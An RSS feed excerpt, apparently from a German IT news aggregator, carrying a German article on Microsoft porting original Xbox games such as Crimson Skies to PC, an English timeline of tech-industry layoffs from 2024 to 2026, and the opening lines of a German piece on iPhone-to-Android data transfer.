<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Wir schreiben das Jahr 2003. Ich bin ein Neuntklässler und spiele auf der Original-Xbox mit einem Controller, der ungefähr so groß ist wie eine Servierplatte. Ich besitze <em>Halo </em>und  <em>Dead or Alive 3</em> und bin von der Grafik völlig begeistert. Das nächste Spiel, das ich mir kaufe, ist <em>Crimson Skies</em>, ein arcadeartiges Luftkampfspiel, das alternative Geschichte mit Abenteuer-Pulp verbindet und über eine wirklich hervorragende Steuerung verfügt.</p>



<p>Seit über 20 Jahren versuche ich nun, dieses Gefühl – wenn schon nicht genau diese Erfahrung – wieder aufleben zu lassen. </p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<p>Die meisten der Blockbuster-Titel aus dem ursprünglichen Xbox-Sortiment können Sie bereits jetzt auf dem PC spielen, darunter auch <em>Halo</em>, für das sowohl ein Remaster als auch ein Remake in Vorbereitung sind. Einige der eher nischenorientierten Titel waren jedoch schon seit sehr, sehr langer Zeit nicht mehr erhältlich, mit Ausnahme einiger weniger, die Sie über den Game Pass streamen können.</p>



<p>Microsoft hat beschlossen, einige dieser weniger bekannten Klassiker – und vielleicht auch ein paar, die dem Begriff „Klassiker“ nicht ganz gerecht werden – in Form vollständiger Portierungen für PC-Spieler verfügbar zu machen.</p>



<h2 class="wp-block-heading">Xbox-„Klassiker“ erhalten PC-Ports</h2>



<p>Das Unternehmen nennt dies „<a href="https://news.xbox.com/en-us/2026/07/22/xbox-backward-compatibility-on-pc/">Xbox-Abwärtskompatibilität auf dem PC</a>“. Der Start erfolgt mit vier Spielen, weitere sollen in Kürze folgen. Diese Spiele laufen lokal auf Ihrem Windows-PC, offenbar ohne jegliche Emulation (oder falls eine Emulation stattfindet, wird dies nicht ausdrücklich erwähnt), wobei bestimmte Mindestsystemanforderungen gelten, darunter eine GTX 950- oder Radeon RX 550-Grafikkarte. Grundsätzlich sollte jeder PC, der in den letzten sechs oder sieben Jahren auf den Markt gekommen ist, diese Anforderungen erfüllen, einschließlich Laptops und Handhelds mit integrierter Grafik.</p>



<p>Zu den ersten Titeln gehört <em>Crimson Skies: High Road to Revenge</em>, von dem ich erst später erfuhr, dass es sich um eine ausschließlich für Konsolen veröffentlichte Fortsetzung eines früheren PC-Spiels handelt. Es kostet zehn Euro – erstaunlich günstig in einer Welt, in der Microsoft 40 Euro für eine Wieder-Wieder-Wiederveröffentlichung von <em>Skyrim </em>verlangt<em>.</em></p>



<p>Ich habe es sofort gekauft und wollte es herunterladen … doch das geht nicht, da es laut der Xbox-App für Windows nur per Streaming über den Game Pass verfügbar ist.</p>



<p>Microsoft gibt an, dass man die neueste Version des Xbox-Insider-Builds benötigt, über die ich bereits verfüge. Dies scheint eine schrittweise Einführung zu sein – ein häufiges Problem bei Funktionen, die von der Xbox-Windows-App abhängig sind. Ich bin etwas verärgert, dass ich es nicht sofort ausprobieren kann.</p>



<p>Das bedeutet auch, dass es nahezu unmöglich sein wird, das Spiel auf einem SteamOS-basierten Gerät zu spielen. Was für mich persönlich sehr schade ist, <a href="https://www.pcwelt.de/article/3194800/steam-machine-im-praxistest-ganz-nett-aber-leider-enttaeuschend.html" target="_blank" rel="noreferrer noopener">da ich gerade erst eine Steam Machine gekauft habe</a>. Ich werde diesen Artikel aktualisieren, sobald ich das Spiel zum Laufen gebracht habe.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a620da47251c"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/image_552da1.png?w=1200" alt="ROG Xbox Ally X playing Crimson Skies" class="wp-image-3197144" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Microsoft</p></div>



<p>Die weiteren Titel sind <em>Blinx: The Time Sweeper</em>, einer der frühen Versuche, der Xbox ein Maskottchen-Plattformspiel zu geben, <em>Conker: Live &amp; Reloaded</em>, ein Remake des N64-Kuriosums <em>Conker’s Bad Fur Day</em>, das<em> </em>nach der Übernahme von Rare durch Microsoft entstand, sowie das extrem für die 2000er Jahre typische Partyspiel <em>Fusion Frenzy</em>. Alle vier waren Teil von Microsofts anfänglicher Veröffentlichungsoffensive für die Xbox, und <em>Blinx </em>sowie<em> Crimson Skies </em>sind zudem über den Game Pass verfügbar.</p>



<p>Ich bin mir sicher, dass es vielen PC-Spielern genauso geht wie mir und sie an mindestens eines dieser Spiele schöne Erinnerungen haben. Insbesondere <em>Blinx</em> bot einige sehr interessante Spielkonzepte, die auf älteren Konsolen nicht möglich waren – ermöglicht durch die interne 8-GB-Festplatte der Xbox, ein entscheidender Unterschied zur Playstation 2 und anderen Konsolen. Weitere Spiele sollen angeblich in Zukunft in die Xbox-Abwärtskompatibilität aufgenommen werden, wobei nicht genau angegeben wurde, um welche es sich dabei handelt.</p>



<h2 class="wp-block-heading">Tiefgreifende Probleme bei Xbox bleiben bestehen</h2>



<p>Doch ich fürchte, ich muss die Stimmung hier zum Schluss etwas trüben. Die Xbox als Plattform und als Geschäftsbereich von Microsoft befindet sich in einer prekären Lage: Sie kann im Wettbewerb mit der Playstation nicht mithalten, wird von Valve mit Steam und SteamOS unter Druck gesetzt und entlässt Tausende von Mitarbeitern aus ihrem riesigen, kostspieligen Bestand an Entwicklern und Publishern. Xbox muss dringend Spieler zurückgewinnen, die nach den massiven Preiserhöhungen für den Game Pass und die Xbox-Hardware möglicherweise zögern, der Plattform noch zu vertrauen.</p>



<p>Diese nostalgischen Neuzugänge für den PC folgen kurz nach Gerüchten über ein neues <em>Fallout-</em>Spiel des bei Fans beliebten Entwicklers (und der Microsoft-Tochter) Obsidian, der stark von Entlassungen betroffen war. Es liegt nahe, beide Schritte als Versuch zu betrachten, das Ruder herumzureißen und/oder die Spieler dazu zu bringen, die tiefgreifenden Probleme innerhalb von Xbox und Microsoft insgesamt zu vergessen. Dazu wird es jedoch mehr als eine 23 Jahre alte Portierung brauchen.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tech layoffs: A 2026 timeline]]></title>
<description><![CDATA[Among a range of factors leading to a wave of tech sector layoffs in 2026 is the rapid rise of artificial intelligence and automation. Companies are reconfiguring their workforces to leverage AI for increased efficiency and reduced operating costs. This realignment and reduction is implemented ev...]]></description>
<link>https://tsecurity.de/de/3689055/it-nachrichten/tech-layoffs-a-2026-timeline/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689055/it-nachrichten/tech-layoffs-a-2026-timeline/</guid>
<pubDate>Thu, 23 Jul 2026 14:35:03 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Among a range of factors leading to a wave of tech sector layoffs in 2026 is the rapid rise of artificial intelligence and automation. Companies are reconfiguring their workforces to leverage AI for increased efficiency and reduced operating costs. This realignment and reduction is implemented even by companies reporting strong financial performance.</p>



<p class="wp-block-paragraph">But it’s not just AI leading to workforce cuts. Complementing this technological shift are ongoing economic uncertainty, inflation, and higher interest rates, compounded by a chip shortage and rising energy costs. This mix is driving companies to cut costs and streamline operations for increased efficiency.</p>



<p class="wp-block-paragraph">According to data compiled by <a href="https://layoffs.fyi/" target="_blank" rel="noreferrer noopener">Layoffs.fyi</a>, an online tracker that keep tabs on job losses in the technology sector, 123,941 tech employees were laid off at 269 companies in 2025. The site also reports that 71,981 government employees were laid off by DOGE alone, with 182,528 total federal workers laid off.</p>



<p class="wp-block-paragraph">Here is a list — to be updated regularly — of some of the most prominent technology layoffs the industry has experienced recently.</p>



<h2 class="wp-block-heading">Notable tech layoffs in 2026</h2>



<ul class="wp-block-list">
<li>Monday.com</li>



<li>Microsoft</li>



<li>Meta</li>



<li>Cisco</li>



<li>Cloudflare</li>



<li>Oracle</li>



<li>Atlassian </li>



<li>Salesforce</li>



<li>Amazon</li>



<li>Ericsson</li>
</ul>



<h3 class="wp-block-heading">July 22, 2026: Monday.com cuts 20% of its workforce to restructure for the AI era</h3>



<p class="wp-block-paragraph">The company says the decision to <a href="https://www.computerworld.com/article/4200349/monday-com-cuts-20-of-its-workforce-to-restructure-for-the-ai-era-2.html">cut 620 jobs</a> isn’t about margins, but about creating a flatter organization built around AI agents, autonomous teams, and deeper customer engagement.</p>



<h3 class="wp-block-heading">July 6, 2026: Microsoft cuts 4,800 jobs, primarily in sales and Xbox teams</h3>



<p class="wp-block-paragraph">As the company <a href="https://www.computerworld.com/article/4193532/microsoft-bets-that-enterprise-ai-needs-engineers-not-bigger-sales-teams-2.html" target="_blank">trims thousands of jobs</a>, it’s also investing in embedded engineering teams and AI infrastructure. The layoffs come several weeks after the company offered 8,750 US employees <a href="https://www.computerworld.com/article/4163188/microsoft-to-offer-voluntary-retirement-buyouts-to-about-7-of-the-us-workforce.html">voluntary retirement buyouts</a>.</p>



<h3 class="wp-block-heading">June 5, 2026: Tech industry cut 38,242 jobs in May, worst since 2024</h3>



<p class="wp-block-paragraph">AI was blamed for 40% of <a href="https://www.computerworld.com/article/4181822/tech-industry-cut-38242-jobs-in-may-worst-since-2024.html">the job cuts in May</a>, up from 7% in January, according to research by employment placement company Challenger, Gray &amp; Christmas.</p>



<h3 class="wp-block-heading">May 20, 2026: Meta cuts 8,000 jobs, around 10% of workforce</h3>



<p class="wp-block-paragraph">The cuts are expected to expected to hit Meta’s engineering and product teams the hardest, arriving as Meta pivots toward AI to boost efficiency across its organization, <a href="https://tech.yahoo.com/general/article/meta-starts-cutting-8000-jobs-as-part-of-previously-announced-layoffs-145220586.html" target="_blank" rel="noreferrer noopener">according to Yahoo Tech</a>.</p>



<h3 class="wp-block-heading">May 13, 2026: Cisco to cut nearly 4,000 jobs despite strong growth in AI, enterprise networking</h3>



<p class="wp-block-paragraph">Despite reporting positive financial news — including record third-quarter revenue of $15.8 billion, a 12% year-over-year increase — Cisco said it will <a href="https://www.networkworld.com/article/4171043/cisco-to-cut-nearly-4000-jobs-despite-strong-growth-in-ai-enterprise-networking.html" target="_blank">eliminate almost 4,000 jobs</a>.</p>



<h3 class="wp-block-heading">May 7, 2026: Cloudflare to cut 1,100 jobs in AI-focused restructuring</h3>



<p class="wp-block-paragraph">About <a href="https://finance.yahoo.com/markets/stocks/articles/cloudflare-cut-over-1-100-204726989.html" target="_blank" rel="noreferrer noopener">20% of Cloudflare’s global workforce will be culled</a> as the company pivots for the agentic AI era, Reuters reported.</p>



<h3 class="wp-block-heading">April 1, 2026: Oracle to cut up to 30,000 jobs globally, putting enterprise support and roadmaps at risk</h3>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4153113/oracle-cuts-up-to-30000-jobs-globally-putting-enterprise-support-and-roadmaps-at-risk.html">Oracle began laying off employees</a> on March 31 in what could be the largest workforce reduction in the company’s history. Employees received termination emails at 6 a.m. local time with immediate system lockouts and no prior warning. <em>(Note: in June, CNBC put the <a href="https://www.cnbc.com/2026/06/23/oracle-ai-job-cuts-layoffs-21000.html" target="_blank" rel="noreferrer noopener">final layoff tally at 21,000</a>.)</em></p>



<h3 class="wp-block-heading">March 12, 2026: Atlassian cuts 1,600 jobs to fund AI and enterprise expansion</h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4144218/atlassian-cuts-1600-jobs-to-fund-ai-and-enterprise-expansion.html">Atlassian will reduce its global workforce</a> by approximately 10%, eliminating around 1,600 roles, as the collaboration software maker redirects capital toward artificial intelligence development and enterprise sales.</p>



<h3 class="wp-block-heading">March 11, 2026: Tech layoffs surpass 45,000 in early 2026</h3>



<p class="wp-block-paragraph">A recent analysis by RationalFX found 45,363 job cuts globally so far this year—with roughly 68% or more than 30,000 occurring in the U.S. — highlighting ongoing <a href="https://www.networkworld.com/article/4143749/tech-layoffs-surpass-45000-in-early-2026.html" target="_blank">workforce cuts even as many tech companies report strong revenue growth</a>.</p>



<h3 class="wp-block-heading">February 10, 2026: Salesforce lays off staffers as executive leadership churn continues</h3>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4130028/salesforce-lays-off-staffers-as-executive-leadership-churn-continues.html" target="_blank">Salesforce has reduced close to 1,000 roles</a> earlier this month across teams, including marketing, product management, data analytics, and its <a href="https://www.cio.com/article/4011936/salesforce-agentforce-3-promises-new-ways-to-monitor-and-manage-ai-agents.html">Agentforce</a> AI unit, <a href="https://www.businessinsider.com/salesforce-cuts-jobs-executive-changes-2026-2">Business Insider</a> reported, quoting employees familiar with the matter.</p>



<h3 class="wp-block-heading">January 23, 2026: Amazon layoffs expected to disproportionately hit AWS and tech talent</h3>



<p class="wp-block-paragraph">As the market slows down, <a href="https://www.computerworld.com/article/4121653/amazon-layoffs-expected-to-disproportionately-hit-aws-and-tech-talent.html">AWS and other Amazon units are preparing for another round of layoffs</a>, which is expected to overwhelmingly impact tech talent. An email from HR leader Beth Galetti on Jan. 28 <a href="https://www.computerworld.com/article/4123477/amazon-confirms-16000-job-cuts-including-to-aws.html">confirmed 16,000 job cuts</a>.</p>



<h3 class="wp-block-heading">January 15, 2026: Ericsson plans to shed 1,600 jobs in Sweden</h3>



<p class="wp-block-paragraph"> Ericsson lans to cut some 1,600 jobs in Sweden, the telecommunications equipment maker said doubling down on recent cost-saving measures that have helped it weather a prolonged downturn in telecoms spending, <a href="https://www.reuters.com/business/world-at-work/ericsson-shed-1600-jobs-sweden-2026-01-15/" target="_blank" rel="noreferrer noopener">Reuters reports</a>.</p>



<h3 class="wp-block-heading">January 13, 2026: Meta plans to cut around 10% of employees in Reality Labs business</h3>



<p class="wp-block-paragraph">Meta plans to cut around 10% of the employees in its Reality Labs division who work on products including the metaverse, according to three people with knowledge of the discussions, <a href="http://meta%20plans%20to%20cut%20around%2010%25%20of%20employees%20in%20reality%20labs%20business/" target="_blank" rel="noreferrer noopener">according to The New York Times</a>.</p>



<h2 class="wp-block-heading">Layoffs in 2025</h2>



<ul class="wp-block-list">
<li>Cisco</li>



<li>Oracle</li>



<li>Windsurf</li>



<li>Intel</li>



<li>Microsoft</li>



<li>Crowdstrike</li>



<li>HPE</li>



<li>Autodesk</li>



<li>HPE</li>



<li>CISA</li>



<li>Workday</li>



<li>Salesforce</li>



<li>Meta</li>
</ul>



<h3 class="wp-block-heading">Global tech-sector layoffs surpass 244,000 in 2025</h3>



<p class="wp-block-paragraph">Economic uncertainty, elevated interest rates, and AI adoption have <a href="https://www.networkworld.com/article/4114572/global-tech-sector-layoffs-surpass-244000-in-2025.html" target="_blank">driven workforce reductions across tech companies worldwide</a>, according to a RationalFX report.</p>



<h3 class="wp-block-heading">October 28, 2025: Amazon to cut 14,000 jobs across company</h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4080142/amazon-to-cut-14000-jobs-across-company.html">Amazon will reduce its overall workforce</a> by 14,000, cutting layers of management across the company and hiring in some areas to support its “biggest bets”.</p>



<h3 class="wp-block-heading">August 18, 2025: Cisco and Oracle to cut hundreds of Bay Area jobs</h3>



<p class="wp-block-paragraph">Tech companies Cisco and Oracle are <a href="https://www.sfchronicle.com/tech/article/cisco-oracle-layoffs-bay-area-20824135.php" target="_blank" rel="noreferrer noopener">cutting hundreds of jobs across the Bay Area</a>. Cisco will eliminate 221 positions at its Milpitas and San Francisco offices, effective Oct. 13. Oracle is reducing 101 positions in Santa Clara on the same date </p>



<h3 class="wp-block-heading">August 5, 2025: 3 weeks after acquiring Windsurf, Cognition offers staff the exit door</h3>



<p class="wp-block-paragraph">Cognition, the AI coding startup that acquired rival company Windsurf three weeks ago, laid off 30 employees last week and is offering buyouts to the roughly 200 remaining employees on the team, <a href="https://www.theinformation.com/articles/cognition-offers-buyouts-newly-acquired-windsurf-staff" target="_blank" rel="noreferrer noopener">reports The Information</a>.</p>



<h3 class="wp-block-heading">July 25, 2025, Intel to lay off 22% of workforce, CEO Tan signals ‘no more blank checks’</h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4028896/intel-to-lay-off-22-of-workforce-as-ceo-tan-signals-no-more-blank-checks.html">Intel will reduce its workforce to 75,000 employees</a> by the end of 2025 as new CEO Lip-Bu Tan implements sweeping changes designed to transform the struggling chipmaker</p>



<h3 class="wp-block-heading">July 8, 2025, Intel layoffs begin: Chipmaker is cutting many thousands of jobs</h3>



<p class="wp-block-paragraph">Intel has begun laying off employees across the company. CEO Lip-Bu Tan told workers back in April to expect <a href="https://www.oregonlive.com/silicon-forest/2025/07/intel-layoffs-begin-chipmaker-is-cutting-many-thousands-of-jobs.html">major layoffs at Intel </a>in the coming months as the chipmaker slashes costs and overhauls its organization after years of technical setbacks and falling sales. </p>



<h3 class="wp-block-heading">July 2, 2025: Microsoft will cut 9,000 workers</h3>



<p class="wp-block-paragraph">Microsoft will lay off about 9,000 employees, a source familiar with the workforce cut <a href="https://www.nbcnews.com/business/business-news/microsoft-laying-9000-employees-latest-cuts-rcna216553">told CNBC</a>.  The cuts will reportedly affect less than 4% of Microsoft’s global workforce and will impact different teams, geographies and levels of experience. This is the latest in a string of cuts the tech giant has made this year.</p>



<h3 class="wp-block-heading">June 17, 2025: Intel looks to factory layoffs to return to profitability</h3>



<p class="wp-block-paragraph"><a href="https://www.networkworld.com/article/4008670/can-intel-cut-its-way-to-profit-with-factory-layoffs.html">Intel will lay off up to 20% of its manufacturing sector employees</a> starting in July,  according to media reports, as the company looks for options as it seeks a return to profitability. The cuts reportedly will be made around the world, but some of the layoffs will be closer to home, according to a report in The Oregonian citing an internal company memo from Intel manufacturing Vice President Naga Chandrasekaran.</p>



<h3 class="wp-block-heading">May 7, 2025: CrowdStrike to lay off 5% of staff</h3>



<p class="wp-block-paragraph"><a href="https://www.reuters.com/sustainability/crowdstrike-lay-off-5-staff-reaffirms-forecasts-2025-05-07/">CrowdStrike announced a plan to cut about 500 roles</a>, roughly 5% of its workforce, to streamline operations and reduce costs. The cybersecurity company will incur about $36 million to $53 million in charges related to the layoffs</p>



<h3 class="wp-block-heading">March 6, 2025: HPE cuts 2,500 jobs, remains committed to Juniper buy</h3>



<p class="wp-block-paragraph">CEO Antonio Neri told Wall Street analysts that <a href="https://www.networkworld.com/article/3840596/hpe-cuts-2500-workers-expects-juniper-buy-to-close-end-of-25-faces-tariff-issues.html">HPE would begin implementing a cost-cutting program involving layoffs </a>of about 2,500 employees over the next 18 months. HPE employs about 61,000 people worldwide.</p>



<h3 class="wp-block-heading">Feb. 27, 2025: Autodesk to lay off 9% of workforce</h3>



<p class="wp-block-paragraph">Software maker Autodesk is laying off 1,350 staff. With the rise of subscription and multi-year contracts billed annually, and self-service enablement, it finds it needs fewer sales staff, <a href="https://adsknews.autodesk.com/en/news/022725-employee-message/">CEO Andrew Anagnost said in a message to employees</a>. And with its cloud, platform, and AI products proving most profitable, it’s concentrating its staff and investments there. </p>



<h3 class="wp-block-heading">Feb. 27, 2025: HP to lay off 2,000 more</h3>



<p class="wp-block-paragraph">As part of an ongoing restructuring, HP plans to lay off up to another 2,000 workers. In recent weeks, the company has tried — unsuccessfully — to do away with telephone support staff by <a href="https://www.pcworld.com/article/2617767/hp-forced-callers-to-wait-15-minutes-before-connecting-to-support-staff.html">forcing callers to wait for at least 15 minutes</a> if they refuse to use self-service support resources online. The company swiftly backtracked, but wider job cuts are still on. </p>



<h3 class="wp-block-heading">Feb. 21, 2025: <a href="https://www.csoonline.com/article/3829710/firing-of-130-cisa-staff-worries-cybersecurity-industry.html">CISA lays off 130</a></h3>



<p class="wp-block-paragraph">Government employees get laid off too: In this case, 130 workers at the US Cybersecurity and Infrastructure Security Agency are being shown the door as a result of a DOGE decision. Cybersecurity experts are concerned that the cuts will harm the international collaborations that CISA has fostered, quite apart from their concerns about the security of the DOGE layoff process itself.</p>



<h3 class="wp-block-heading">Feb. 5, 2025: <a href="https://www.computerworld.com/article/3817887/workday-to-cut-1750-jobs-shift-focus-to-ai-and-global-expansion.html">Workday lays off 1,750</a></h3>



<p class="wp-block-paragraph">As it moves to invest more in AI and international growth, Workday is laying off 8.5% of its workforce and disposing of unused office space. Some analysts fear the cutbacks will affect the company’s customer service — unless AI can pick up the slack.</p>



<h3 class="wp-block-heading">Feb. 4, 2025: Salesforce lays off over 1,000</h3>



<p class="wp-block-paragraph">At the same time as it’s hiring sales staff for its new artificial intelligence products, Salesforce is laying off over 1,000 workers across the company, according to Bloomberg. As of June, 2024, the company had over 72,000 employees, according to its website. Salesforce did not comment on the report. In 2024 the company reportedly laid off around 1,000 staff too, in two waves: January and July.</p>



<h3 class="wp-block-heading">Jan. 14, 2025: Meta will lay off 5% of workforce</h3>



<p class="wp-block-paragraph">Mark Zuckerberg told Meta employees he intended to “move out the low performers faster” in an internal memo reported by Bloomberg. The memo announced that the company will lay off 5% of its staff, or around 3,600 staff, beginning Feb. 10. The company had already reduced its headcount by 5% in 2024 through natural attrition, the memo said. Among those leaving the company will be staff previously responsible for fact checking of posts on its social media platforms in the US, as the company begins relying on its users to police content.</p>



<h2 class="wp-block-heading">Tech layoffs in 2024</h2>



<ul class="wp-block-list">
<li>Equinix</li>



<li>AMD</li>



<li>Freshworks</li>



<li>Cisco</li>



<li>General Motors</li>



<li>Intel</li>



<li>OpenText</li>



<li>Microsoft</li>



<li>AWS</li>



<li>Dell</li>
</ul>



<h3 class="wp-block-heading">Nov. 26, 2024: <a href="https://www.networkworld.com/article/3613399/equinix-to-cut-3-of-staff-amidst-the-greatest-demand-for-data-center-infrastructure-ever.html">Equinix to cut 3% of staff</a></h3>



<p class="wp-block-paragraph">Despite intense demand for its data center capacity, Equinix is planning to lay off 3% of its workforce, or around 400 employees. The announcement followed the appointment of Adaire Fox-Martin to replace Charles Meyers as CEO and the departures of two other senior executives, CIO Milind Wagle and CISO Michael Montoya.</p>



<h3 class="wp-block-heading">Nov. 13, 2024: <a href="https://www.networkworld.com/article/3605016/amd-to-cut-4-of-workforce-to-prioritize-ai-chip-expansion-to-rival-nvidia.html#:~:text=Workforce%20reduction%20comes%20amid%20strong,shift%20in%20focus%20toward%20AI.&amp;text=Advanced%20Micro%20Devices%20(AMD)%20is,Nvidia's%20lead%20in%20the%20sector.">AMD to cut 4% of workforce</a></h3>



<p class="wp-block-paragraph">AMD will lay off around 1,000 employees as it pivots towards developing AI-focused chips, it said. The move came as a surprise to staff, as the company also reported strong quarterly earnings. </p>



<h3 class="wp-block-heading">Nov. 7, 2024: <a href="https://www.cio.com/article/3601088/freshworks-lays-off-660-about-13-percent-of-its-global-workforce-despite-strong-earnings-profits.html">Freshworks lays off 660</a></h3>



<p class="wp-block-paragraph">Enterprise software vendor Freshworks laid off around 660 staff, or around 13% of its headcount, despite reporting increased revenue and profits in its fourth fiscal quarter. The company described the layoffs as a realignment of its global workforce.</p>



<h3 class="wp-block-heading">Sept. 17, 2024: <a href="https://www.networkworld.com/article/3486901/cisco-to-cut-7-of-workforce-restructure-product-groups.html">Cisco lays off 6,000</a></h3>



<p class="wp-block-paragraph">After laying off around 4,200 staff in February, Cisco is at it again, laying off another 6,000 or around 7% of its workforce. Among the divisions affected were its threat intelligence unit, Talos Security. </p>



<h3 class="wp-block-heading">Aug. 20, 2024: <a href="https://www.cio.com/article/3489323/gm-software-layoffs-could-signal-a-shift-in-digital-transformation-strategy.html">General Motors lays off 1,000 software staff</a></h3>



<p class="wp-block-paragraph">More than 1,000 software and services staff are on the way out at General Motors, signalling that it could be rethinking its digital transformation strategy. In an internal memo, the company said that it was moving resources to its highest-priority work and flattening hierarchies.</p>



<h3 class="wp-block-heading">August 1, 2024: <a href="https://www.computerworld.com/article/3480715/intel-fires-15000-employees-as-it-intensifies-focus-on-ai.html">Intel removes 15,000 roles</a></h3>



<p class="wp-block-paragraph">Intel plans to cut its workforce by around 15% to reduce costs after a disastrous second quarter. Revenue for the three months to June 29 stagnated at around $12.8 billion, but net income fell 85% to $83 million, prompting CEO Pat Gelsinger to bring forward a company-wide meeting in order to announce that 15,000 staff would lose their jobs. “This is an incredibly hard day for Intel as we are making some of the most consequential changes in our company’s history,” Gelsinger wrote in an email to staff, continuing: “Our revenues have not grown as expected — and we’ve yet to fully benefit from powerful trends, like AI. Our costs are too high, our margins are too low. We need bolder actions to address both — particularly given our financial results and outlook for the second half of 2024, which is tougher than previously expected.”</p>



<h3 class="wp-block-heading">July 4, 2024: <a href="https://www.computerworld.es/article/2513686/opentext-despedira-a-cerca-de-1-200-empleados.html">OpenText to lay off 1,200</a></h3>



<p class="wp-block-paragraph">OpenText said it will lay off 1,200 staff, or about 1.7% of its workforce, in a bid to save around $100 million annually. It plans to hire new sales and engineering staff in other areas in 2025, it said.</p>



<h3 class="wp-block-heading">June 4, 2024: <a href="https://www.networkworld.com/article/2138075/microsoft-lays-off-staffers-from-its-azure-division.html">Microsoft lays off staff in Azure division</a></h3>



<p class="wp-block-paragraph">Microsoft laid off staff in several teams supporting its cloud services, including Azure for Operations and Mission Engineering. The company didn’t say exactly how many staff were leaving.</p>



<h3 class="wp-block-heading">April 4, 2024: <a href="https://www.cio.com/article/2081437/amazon-downsizes-aws-in-a-fresh-cost-cutting-round.html">Amazon downsizes AWS</a> in a fresh cost-cutting round</h3>



<p class="wp-block-paragraph">Amazon announced hundreds of layoffs in the sales and marketing teams of its AWS cloud services division — and also in the technology development teams for its physical retail stores, as it stepped back from efforts to generalize the “<a href="https://www.cio.com/article/2079910/amazon-drops-just-walk-out-technology-at-its-us-retail-locations.html">Just Walk Out</a>” technology built for its Amazon Fresh grocery stores. </p>



<h3 class="wp-block-heading">April 1, 2024: <a href="https://investors.delltechnologies.com/static-files/d6e82f58-d417-422f-b2f3-4d08d498abd4" target="_blank" rel="noreferrer noopener">Dell acknowledges 13,000 job cuts</a></h3>



<p class="wp-block-paragraph">Dell Technologies’ <a href="https://investors.delltechnologies.com/static-files/d6e82f58-d417-422f-b2f3-4d08d498abd4" target="_blank" rel="noreferrer noopener">latest 10K filing with the US Securities and Exchange Commission</a> disclosed that the company had laid off 13,000 employees over the course of the 2023 fiscal year; it characterized the layoffs and other reorganizational moves as cost-cutting measures. “These actions resulted in a reduction in our overall headcount,” the company said. A comparison to the previous year’s 10K filing, performed by The Register, found that Dell employed 133,000 people at that point, compared to 120,000 as of February 2024. Dell announced layoffs of 6,650 staffers on Feb. 6, but it is unclear whether those cuts were reflected in the numbers from this year’s 10K statement.</p>



<p class="wp-block-paragraph"><em><a href="https://www.computerworld.com/article/3816662/tech-layoffs-in-2024-a-timeline.html">See news of earlier layoffs.</a></em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google macht die Dateiübertragung von iPhone zu Android deutlich einfacher: So geht’s]]></title>
<description><![CDATA[Der Umstieg von einem iPhone auf ein Android-Smartphone ist soeben deutlich einfacher geworden. Wie Google gestern im Zuge der “Samsung Galaxy Unpacked“-Veranstaltung angekündigt hat, profitieren iPhone-Nutzer jetzt von einer deutlich simpleren Datenübertragung als bisher.



Direkt in Android 17...]]></description>
<link>https://tsecurity.de/de/3689046/it-nachrichten/google-macht-die-dateiuebertragung-von-iphone-zu-android-deutlich-einfacher-so-gehts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689046/it-nachrichten/google-macht-die-dateiuebertragung-von-iphone-zu-android-deutlich-einfacher-so-gehts/</guid>
<pubDate>Thu, 23 Jul 2026 14:34:51 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Der Umstieg von einem iPhone auf ein Android-Smartphone ist soeben deutlich einfacher geworden. Wie Google gestern im Zuge der “<a href="https://www.pcwelt.de/article/3186787/galaxy-unpacked-event-heute-ab-15-uhr-hier-im-live-stream-das-stellt-samsung-alles-vor.html" target="_blank" rel="noreferrer noopener">Samsung Galaxy Unpacked</a>“-Veranstaltung <a href="https://blog.google/products-and-platforms/platforms/android/galaxy-unpacked-switch-from-iphone-to-android/" target="_blank" rel="noreferrer noopener">angekündigt </a>hat, profitieren iPhone-Nutzer jetzt von einer deutlich simpleren Datenübertragung als bisher.</p>



